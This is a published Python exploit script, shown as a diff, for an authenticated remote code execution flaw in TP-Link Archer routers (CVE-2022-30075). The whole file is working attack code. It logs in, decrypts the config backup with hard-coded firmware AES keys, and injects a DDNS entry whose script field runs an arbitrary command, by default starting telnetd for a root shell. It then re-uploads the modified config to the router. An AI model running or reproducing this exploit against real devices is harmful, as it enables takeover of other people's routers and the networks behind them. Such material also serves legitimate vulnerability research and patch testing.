| 1 | + | #!/usr/bin/python3 |
| 2 | + | # Exploit Title: TP-Link Routers - Authenticated Remote Code Execution |
| 3 | + | # Exploit Author: Tomas Melicher |
| 4 | + | # Technical Details: https://github.com/aaronsvk/CVE-2022-30075 |
| 5 | + | # Date: 2022-06-08 |
| 6 | + | # Vendor Homepage: https://www.tp-link.com/ |
| 7 | + | # Tested On: Tp-Link Archer AX50 |
| 8 | + | # Vulnerability Description: |
| 9 | + | # Remote Code Execution via importing malicious config file |
| 10 | + | |
| 11 | + | import argparse # pip install argparse |
| 12 | + | import requests # pip install requests |
| 13 | + | import binascii, base64, os, re, json, sys, time, math, random, hashlib |
| 14 | + | import tarfile, zlib |
| 15 | + | from Crypto.Cipher import AES, PKCS1_v1_5, PKCS1_OAEP # pip install pycryptodome |
| 16 | + | from Crypto.PublicKey import RSA |
| 17 | + | from Crypto.Util.Padding import pad, unpad |
| 18 | + | from Crypto.Random import get_random_bytes |
| 19 | + | from urllib.parse import urlencode |
| 20 | + | |
| 21 | + | class WebClient(object): |
| 22 | + | |
| 23 | + | def __init__(self, target, password): |
| 24 | + | self.target = target |
| 25 | + | self.password = password.encode('utf-8') |
| 26 | + | self.password_hash = hashlib.md5(('admin%s'%password).encode('utf-8')).hexdigest().encode('utf-8') |
| 27 | + | self.aes_key = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8') |
| 28 | + | self.aes_iv = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8') |
| 29 | + | |
| 30 | + | self.stok = '' |
| 31 | + | self.session = requests.Session() |
| 32 | + | |
| 33 | + | data = self.basic_request('/login?form=auth', {'operation':'read'}) |
| 34 | + | if data['success'] != True: |
| 35 | + | print('[!] unsupported router') |
| 36 | + | return |
| 37 | + | self.sign_rsa_n = int(data['data']['key'][0], 16) |
| 38 | + | self.sign_rsa_e = int(data['data']['key'][1], 16) |
| 39 | + | self.seq = data['data']['seq'] |
| 40 | + | |
| 41 | + | data = self.basic_request('/login?form=keys', {'operation':'read'}) |
| 42 | + | self.password_rsa_n = int(data['data']['password'][0], 16) |
| 43 | + | self.password_rsa_e = int(data['data']['password'][1], 16) |
| 44 | + | |
| 45 | + | self.stok = self.login() |
| 46 | + | |
| 47 | + | |
| 48 | + | def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext): |
| 49 | + | cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv) |
| 50 | + | plaintext_padded = pad(plaintext, aes_block_size) |
| 51 | + | return cipher.encrypt(plaintext_padded) |
| 52 | + | |
| 53 | + | |
| 54 | + | def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext): |
| 55 | + | cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv) |
| 56 | + | plaintext_padded = cipher.decrypt(ciphertext) |
| 57 | + | plaintext = unpad(plaintext_padded, aes_block_size) |
| 58 | + | return plaintext |
| 59 | + | |
| 60 | + | |
| 61 | + | def rsa_encrypt(self, n, e, plaintext): |
| 62 | + | public_key = RSA.construct((n, e)).publickey() |
| 63 | + | encryptor = PKCS1_v1_5.new(public_key) |
| 64 | + | block_size = int(public_key.n.bit_length()/8) - 11 |
| 65 | + | encrypted_text = '' |
| 66 | + | for i in range(0, len(plaintext), block_size): |
| 67 | + | encrypted_text += encryptor.encrypt(plaintext[i:i+block_size]).hex() |
| 68 | + | return encrypted_text |
| 69 | + | |
| 70 | + | |
| 71 | + | def download_request(self, url, post_data): |
| 72 | + | res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, stream=True) |
| 73 | + | filepath = os.getcwd()+'/'+re.findall(r'(?<=filename=")[^"]+', res.headers['Content-Disposition'])[0] |
| 74 | + | if os.path.exists(filepath): |
| 75 | + | print('[!] can\'t download, file "%s" already exists' % filepath) |
| 76 | + | return |
| 77 | + | with open(filepath, 'wb') as f: |
| 78 | + | for chunk in res.iter_content(chunk_size=4096): |
| 79 | + | f.write(chunk) |
| 80 | + | return filepath |
| 81 | + | |
| 82 | + | |
| 83 | + | def basic_request(self, url, post_data, files_data={}): |
| 84 | + | res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, files=files_data) |
| 85 | + | return json.loads(res.content) |
| 86 | + | |
| 87 | + | |
| 88 | + | def encrypted_request(self, url, post_data): |
| 89 | + | serialized_data = urlencode(post_data) |
| 90 | + | encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, serialized_data.encode('utf-8')) |
| 91 | + | encrypted_data = base64.b64encode(encrypted_data) |
| 92 | + | |
| 93 | + | signature = ('k=%s&i=%s&h=%s&s=%d'.encode('utf-8')) % (self.aes_key, self.aes_iv, self.password_hash, self.seq+len(encrypted_data)) |
| 94 | + | encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature) |
| 95 | + | |
| 96 | + | res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data={'sign':encrypted_signature, 'data':encrypted_data}) # order of params is important |
| 97 | + | if(res.status_code != 200): |
| 98 | + | print('[!] url "%s" returned unexpected status code'%(url)) |
| 99 | + | return |
| 100 | + | encrypted_data = json.loads(res.content) |
| 101 | + | encrypted_data = base64.b64decode(encrypted_data['data']) |
| 102 | + | data = self.aes_decrypt(self.aes_key, self.aes_iv, AES.block_size, encrypted_data) |
| 103 | + | return json.loads(data) |
| 104 | + | |
| 105 | + | |
| 106 | + | def login(self): |
| 107 | + | post_data = {'operation':'login', 'password':self.rsa_encrypt(self.password_rsa_n, self.password_rsa_e, self.password)} |
| 108 | + | data = self.encrypted_request('/login?form=login', post_data) |
| 109 | + | if data['success'] != True: |
| 110 | + | print('[!] login failed') |
| 111 | + | return |
| 112 | + | print('[+] logged in, received token (stok): %s'%(data['data']['stok'])) |
| 113 | + | return data['data']['stok'] |
| 114 | + | |
| 115 | + | |
| 116 | + | |
| 117 | + | class BackupParser(object): |
| 118 | + | |
| 119 | + | def __init__(self, filepath): |
| 120 | + | self.encrypted_path = os.path.abspath(filepath) |
| 121 | + | self.decrypted_path = os.path.splitext(filepath)[0] |
| 122 | + | |
| 123 | + | self.aes_key = bytes.fromhex('2EB38F7EC41D4B8E1422805BCD5F740BC3B95BE163E39D67579EB344427F7836') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua |
| 124 | + | self.iv = bytes.fromhex('360028C9064242F81074F4C127D299F6') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua |
| 125 | + | |
| 126 | + | |
| 127 | + | def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext): |
| 128 | + | cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv) |
| 129 | + | plaintext_padded = pad(plaintext, aes_block_size) |
| 130 | + | return cipher.encrypt(plaintext_padded) |
| 131 | + | |
| 132 | + | |
| 133 | + | def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext): |
| 134 | + | cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv) |
| 135 | + | plaintext_padded = cipher.decrypt(ciphertext) |
| 136 | + | plaintext = unpad(plaintext_padded, aes_block_size) |
| 137 | + | return plaintext |
| 138 | + | |
| 139 | + | |
| 140 | + | def encrypt_config(self): |
| 141 | + | if not os.path.isdir(self.decrypted_path): |
| 142 | + | print('[!] invalid directory "%s"'%(self.decrypted_path)) |
| 143 | + | return |
| 144 | + | |
| 145 | + | # encrypt, compress each .xml using zlib and add them to tar archive |
| 146 | + | with tarfile.open('%s/data.tar'%(self.decrypted_path), 'w') as tar: |
| 147 | + | for filename in os.listdir(self.decrypted_path): |
| 148 | + | basename,ext = os.path.splitext(filename) |
| 149 | + | if ext == '.xml': |
| 150 | + | xml_path = '%s/%s'%(self.decrypted_path,filename) |
| 151 | + | bin_path = '%s/%s.bin'%(self.decrypted_path,basename) |
| 152 | + | with open(xml_path, 'rb') as f: |
| 153 | + | plaintext = f.read() |
| 154 | + | if len(plaintext) == 0: |
| 155 | + | f = open(bin_path, 'w') |
| 156 | + | f.close() |
| 157 | + | else: |
| 158 | + | compressed = zlib.compress(plaintext) |
| 159 | + | encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed) |
| 160 | + | with open(bin_path, 'wb') as f: |
| 161 | + | f.write(encrypted) |
| 162 | + | tar.add(bin_path, os.path.basename(bin_path)) |
| 163 | + | os.unlink(bin_path) |
| 164 | + | # compress tar archive using zlib and encrypt |
| 165 | + | with open('%s/md5_sum'%(self.decrypted_path), 'rb') as f1, open('%s/data.tar'%(self.decrypted_path), 'rb') as f2: |
| 166 | + | compressed = zlib.compress(f1.read()+f2.read()) |
| 167 | + | encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed) |
| 168 | + | # write into final config file |
| 169 | + | with open('%s'%(self.encrypted_path), 'wb') as f: |
| 170 | + | f.write(encrypted) |
| 171 | + | os.unlink('%s/data.tar'%(self.decrypted_path)) |
| 172 | + | |
| 173 | + | |
| 174 | + | def decrypt_config(self): |
| 175 | + | if not os.path.isfile(self.encrypted_path): |
| 176 | + | print('[!] invalid file "%s"'%(self.encrypted_path)) |
| 177 | + | return |
| 178 | + | |
| 179 | + | # decrypt and decompress config file |
| 180 | + | with open(self.encrypted_path, 'rb') as f: |
| 181 | + | decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, f.read()) |
| 182 | + | decompressed = zlib.decompress(decrypted) |
| 183 | + | os.mkdir(self.decrypted_path) |
| 184 | + | # store decrypted data into files |
| 185 | + | with open('%s/md5_sum'%(self.decrypted_path), 'wb') as f: |
| 186 | + | f.write(decompressed[0:16]) |
| 187 | + | with open('%s/data.tar'%(self.decrypted_path), 'wb') as f: |
| 188 | + | f.write(decompressed[16:]) |
| 189 | + | # untar second part of decrypted data |
| 190 | + | with tarfile.open('%s/data.tar'%(self.decrypted_path), 'r') as tar: |
| 191 | + | tar.extractall(path=self.decrypted_path) |
| 192 | + | # decrypt and decompress each .bin file from tar archive |
| 193 | + | for filename in os.listdir(self.decrypted_path): |
| 194 | + | basename,ext = os.path.splitext(filename) |
| 195 | + | if ext == '.bin': |
| 196 | + | bin_path = '%s/%s'%(self.decrypted_path,filename) |
| 197 | + | xml_path = '%s/%s.xml'%(self.decrypted_path,basename) |
| 198 | + | with open(bin_path, 'rb') as f: |
| 199 | + | ciphertext = f.read() |
| 200 | + | os.unlink(bin_path) |
| 201 | + | if len(ciphertext) == 0: |
| 202 | + | f = open(xml_path, 'w') |
| 203 | + | f.close() |
| 204 | + | continue |
| 205 | + | decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, ciphertext) |
| 206 | + | decompressed = zlib.decompress(decrypted) |
| 207 | + | with open(xml_path, 'wb') as f: |
| 208 | + | f.write(decompressed) |
| 209 | + | os.unlink('%s/data.tar'%(self.decrypted_path)) |
| 210 | + | |
| 211 | + | |
| 212 | + | def modify_config(self, command): |
| 213 | + | xml_path = '%s/ori-backup-user-config.xml'%(self.decrypted_path) |
| 214 | + | if not os.path.isfile(xml_path): |
| 215 | + | print('[!] invalid file "%s"'%(xml_path)) |
| 216 | + | return |
| 217 | + | |
| 218 | + | with open(xml_path, 'r') as f: |
| 219 | + | xml_content = f.read() |
| 220 | + | |
| 221 | + | # https://openwrt.org/docs/guide-user/services/ddns/client#detecting_wan_ip_with_script |
| 222 | + | payload = '<service name="exploit">\n' |
| 223 | + | payload += '<enabled>on</enabled>\n' |
| 224 | + | payload += '<update_url>http://127.0.0.1/</update_url>\n' |
| 225 | + | payload += '<domain>x.example.org</domain>\n' |
| 226 | + | payload += '<username>X</username>\n' |
| 227 | + | payload += '<password>X</password>\n' |
| 228 | + | payload += '<ip_source>script</ip_source>\n' |
| 229 | + | payload += '<ip_script>%s</ip_script>\n' % (command.replace('<','<').replace('&','&')) |
| 230 | + | payload += '<interface>internet</interface>\n' # not worked for other interfaces |
| 231 | + | payload += '<retry_interval>5</retry_interval>\n' |
| 232 | + | payload += '<retry_unit>seconds</retry_unit>\n' |
| 233 | + | payload += '<retry_times>3</retry_times>\n' |
| 234 | + | payload += '<check_interval>12</check_interval>\n' |
| 235 | + | payload += '<check_unit>hours</check_unit>\n' |
| 236 | + | payload += '<force_interval>30</force_interval>\n' |
| 237 | + | payload += '<force_unit>days</force_unit>\n' |
| 238 | + | payload += '</service>\n' |
| 239 | + | |
| 240 | + | if '<service name="exploit">' in xml_content: |
| 241 | + | xml_content = re.sub(r'<service name="exploit">[\s\S]+?</service>\n</ddns>', '%s</ddns>'%(payload), xml_content, 1) |
| 242 | + | else: |
| 243 | + | xml_content = xml_content.replace('</service>\n</ddns>', '</service>\n%s</ddns>'%(payload), 1) |
| 244 | + | with open(xml_path, 'w') as f: |
| 245 | + | f.write(xml_content) |
| 246 | + | |
| 247 | + | |
| 248 | + | |
| 249 | + | arg_parser = argparse.ArgumentParser() |
| 250 | + | arg_parser.add_argument('-t', metavar='target', help='ip address of tp-link router', required=True) |
| 251 | + | arg_parser.add_argument('-p', metavar='password', required=True) |
| 252 | + | arg_parser.add_argument('-b', action='store_true', help='only backup and decrypt config') |
| 253 | + | arg_parser.add_argument('-r', metavar='backup_directory', help='only encrypt and restore directory with decrypted config') |
| 254 | + | arg_parser.add_argument('-c', metavar='cmd', default='/usr/sbin/telnetd -l /bin/login.sh', help='command to execute') |
| 255 | + | args = arg_parser.parse_args() |
| 256 | + | |
| 257 | + | client = WebClient(args.t, args.p) |
| 258 | + | parser = None |
| 259 | + | |
| 260 | + | if not args.r: |
| 261 | + | print('[*] downloading config file ...') |
| 262 | + | filepath = client.download_request('/admin/firmware?form=config_multipart', {'operation':'backup'}) |
| 263 | + | if not filepath: |
| 264 | + | sys.exit(-1) |
| 265 | + | |
| 266 | + | print('[*] decrypting config file "%s" ...'%(filepath)) |
| 267 | + | parser = BackupParser(filepath) |
| 268 | + | parser.decrypt_config() |
| 269 | + | print('[+] successfully decrypted into directory "%s"'%(parser.decrypted_path)) |
| 270 | + | |
| 271 | + | if not args.b and not args.r: |
| 272 | + | filepath = '%s_modified'%(parser.decrypted_path) |
| 273 | + | os.rename(parser.decrypted_path, filepath) |
| 274 | + | parser.decrypted_path = os.path.abspath(filepath) |
| 275 | + | parser.encrypted_path = '%s.bin'%(filepath) |
| 276 | + | parser.modify_config(args.c) |
| 277 | + | print('[+] modified directory with decrypted config "%s" ...'%(parser.decrypted_path)) |
| 278 | + | |
| 279 | + | if not args.b: |
| 280 | + | if parser is None: |
| 281 | + | parser = BackupParser('%s.bin'%(args.r.rstrip('/'))) |
| 282 | + | print('[*] encrypting directory with modified config "%s" ...'%(parser.decrypted_path)) |
| 283 | + | parser.encrypt_config() |
| 284 | + | data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'read'}) |
| 285 | + | timeout = data['data']['totaltime'] if data['success'] else 180 |
| 286 | + | print('[*] uploading modified config file "%s"'%(parser.encrypted_path)) |
| 287 | + | data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'restore'}, {'archive':open(parser.encrypted_path,'rb')}) |
| 288 | + | if not data['success']: |
| 289 | + | print('[!] unexpected response') |
| 290 | + | print(data) |
| 291 | + | sys.exit(-1) |
| 292 | + | |
| 293 | + | print('[+] config file successfully uploaded') |
| 294 | + | print('[*] router will reboot in few seconds... when it becomes online again (few minutes), try "telnet %s" and enjoy root shell !!!'%(args.t)) |
| 295 | + | |